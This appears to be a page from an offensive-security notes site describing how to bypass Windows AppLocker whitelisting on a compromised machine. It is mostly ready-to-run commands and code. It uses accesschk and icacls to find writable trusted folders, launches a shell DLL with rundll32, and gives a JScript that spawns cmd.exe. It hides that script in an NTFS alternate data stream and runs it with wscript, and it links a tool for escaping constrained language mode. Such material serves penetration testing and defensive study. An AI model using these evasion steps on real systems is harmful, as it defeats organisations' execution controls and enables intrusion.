> For the complete documentation index, see [llms.txt](https://hacker-mind.gitbook.io/hacker-mind/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacker-mind.gitbook.io/hacker-mind/payload/bypass-all-the-things/applocker.md).

# AppLocker

<figure><img src="/files/eQeoxs5p19I4HjWQMOeD" alt=""><figcaption></figcaption></figure>

## Trusted Folders

need administrator cmd

and tools from sysinternalsSuite

```
accesschk.exe "<current user>" C:\Windows -wus

icacls.exe C:\Windows\Tasks
```

copy the binary to allowed directory. then run that binary.

## Bypass with DLL

```
rundll32 c:\windows\tasks\shell.dll,run
```

## Alternate Data Stream

save this to shell.js

```javascript
var manggo = new ActiveXObject("WScript.Shell");
var pineapple = manggo.Run("cmd.exe");

```

Find the TRUSTED FOLDER that able to W & X by current user

```
type shell.js > "<trusted directory with txt file>\file.txt:shell.js"
# verify the alternate data stream

dir /r "<file name>"
# file.txt:shell.js:$DATA
```

Execute the alternate data stream

```
wscript "<directory>\file.txt:shell.js"
```

## Other technique

check third party script execution which is must be pre-installed in the compromised computer:

* Python

## Still Problem?

use this:

{% embed url="<https://github.com/calebstewart/bypass-clm>" %}

reference:

<https://securitycafe.ro/2023/05/02/bypassing-application-whitelisting/><br>
